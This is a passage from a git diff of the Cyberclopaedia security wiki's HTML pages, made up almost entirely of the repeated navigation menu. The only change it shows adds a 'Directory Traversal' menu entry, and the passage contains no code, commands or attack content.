          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -186,22 +186,6 @@

Analysis

- - diff --git a/docs/Reverse Engineering/Reverse Engineering with radare2/Binary Info.html b/docs/Reverse Engineering/Reverse Engineering with radare2/Binary Info.html index 28c2e0b8..e7202fa8 100644 --- a/docs/Reverse Engineering/Reverse Engineering with radare2/Binary Info.html +++ b/docs/Reverse Engineering/Reverse Engineering with radare2/Binary Info.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -195,22 +195,6 @@

Binary Info

- - diff --git a/docs/Reverse Engineering/Reverse Engineering with radare2/Flags.html b/docs/Reverse Engineering/Reverse Engineering with radare2/Flags.html index 0016c9fc..0e40c4c5 100644 --- a/docs/Reverse Engineering/Reverse Engineering with radare2/Flags.html +++ b/docs/Reverse Engineering/Reverse Engineering with radare2/Flags.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
